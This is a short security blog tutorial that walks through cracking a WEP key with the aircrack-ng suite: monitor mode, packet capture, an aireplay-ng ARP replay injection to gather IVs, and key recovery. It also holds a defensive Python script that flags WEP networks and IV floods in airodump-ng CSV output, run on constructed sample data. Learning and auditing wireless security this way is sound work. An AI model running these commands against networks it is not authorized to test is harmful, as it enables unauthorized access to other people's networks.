Crack WEP key with a Connected Client

Mr. Robot, InfoSec Adventures
Jan 10, 2018 (2 min read)

In this attack scenario, the topology includes an Access Point and at least one connected client. The idea is to collect a large number of encrypted packets together with their Initialisation Vectors; once enough have been gathered, statistical methods can be applied to recover the WEP encryption key.

Steps:

Create a monitoring interface with the following command:

airmon-ng start INTERFACE

Identify the target network using Airodump-ng:

airodump-ng MONITOR_INTERFACE

It’s good practice to put the WNIC (Wireless Network Interface Card) on the same channel as the target Access Point.

ifconfig INTERFACE down
iwconfig INTERFACE channel CHANNEL
ifconfig INTERFACE up

Now, we need to capture the packets and store them:

airodump-ng --bssid TARGET_AP_MAC --channel CHANNEL --write FILE_NAME MONITOR_INTERFACE

In order to increase the number of Data frames, we’ll launch an ARP replay attack:

aireplay-ng -3 -b TARGET_AP_MAC -h CLIENT_MAC MONITOR_INTERFACE

After capturing enough IVs (around 60k should be enough), we can start cracking the WEP key:

aircrack-ng FILE_NAME.cap
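From the defender's side, the same airodump-ng capture that the --write step produces (the FILE_NAME-01.csv beside the .cap) is a convenient audit source: it lists every network's Privacy mode and how many IVs were seen in the capture window, and an IV count growing by hundreds per second is exactly the footprint the ARP replay step above leaves. The script below is an added example, not part of the article or of the aircrack-ng suite; the CSV column layout and the 50 IV/s threshold are my assumptions, and the sample rows are constructed.

```python
import csv
import io
from datetime import datetime

# Constructed sample in the shape of airodump-ng's FILE_NAME-01.csv
# (column layout assumed from the tool's usual output, not from the article).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2018-01-10 10:00:00, 2018-01-10 10:05:00, 6, 54, WEP, WEP, OPN, -40, 2900, 61000, 0. 0. 0. 0, 6, OldNet, 
66:77:88:99:AA:BB, 2018-01-10 10:00:00, 2018-01-10 10:05:00, 11, 54, WPA2, CCMP, PSK, -55, 2800, 0, 0. 0. 0. 0, 7, HomeNet, 
CC:DD:EE:FF:00:11, 2018-01-10 10:00:00, 2018-01-10 10:05:00, 1, 54, WEP, WEP, OPN, -70, 2700, 120, 0. 0. 0. 0, 5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2018-01-10 10:00:00, 2018-01-10 10:05:00, -45, 60500, 00:11:22:33:44:55, OldNet
"""

TIME_FMT = "%Y-%m-%d %H:%M:%S"


def parse_access_points(text):
    """Return the access-point section of an airodump-ng CSV as dicts keyed by header."""
    ap_section = text.strip().split("\n\n")[0]      # first block = APs, second = stations
    rows = list(csv.reader(io.StringIO(ap_section), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    aps = []
    for row in rows[1:]:
        if len(row) < len(header):                  # skip truncated / partial lines
            continue
        aps.append(dict(zip(header, (f.strip() for f in row))))
    return aps


def assess(aps, iv_rate_threshold=50.0):
    """Flag WEP networks; escalate when the IV rate looks like an injection flood.

    Returns (bssid, essid, iv_per_second, finding) tuples, one per WEP network.
    The threshold is an assumed value: normal WEP traffic yields far fewer IVs
    per second than an ARP replay, which pushes hundreds or thousands.
    """
    findings = []
    for ap in aps:
        if ap["Privacy"] != "WEP":
            continue
        first = datetime.strptime(ap["First time seen"], TIME_FMT)
        last = datetime.strptime(ap["Last time seen"], TIME_FMT)
        seconds = max((last - first).total_seconds(), 1.0)   # avoid division by zero
        rate = int(ap["# IV"]) / seconds
        finding = "WEP in use"
        if rate > iv_rate_threshold:
            finding = "WEP in use, possible ARP replay (IV flood)"
        findings.append((ap["BSSID"], ap["ESSID"], round(rate, 1), finding))
    return findings


if __name__ == "__main__":
    for f in assess(parse_access_points(SAMPLE_CSV)):
        print(f)
```

On the constructed sample, OldNet is reported with roughly 203 IVs per second (the replay signature) while Guest is reported only for still running WEP.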

Always keep in mind that you should AVOID using WEP encryption. Wired Equivalent Privacy provides no security and should not be used. It’s good to see people starting to realize this: I haven’t seen WEP in a while, which suggests people are waking up to the importance of wireless security. Next, I’m planning to write about more advanced topics, like attacking WPA2 and KRACK. Stay tuned!

Before you go

Thank you for taking the time to read my article. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interests find it! + Feedback is always welcome! 🙏


Self-taught developer with an interest in Offensive Security. I regularly play on Vulnhub and Hack The Box.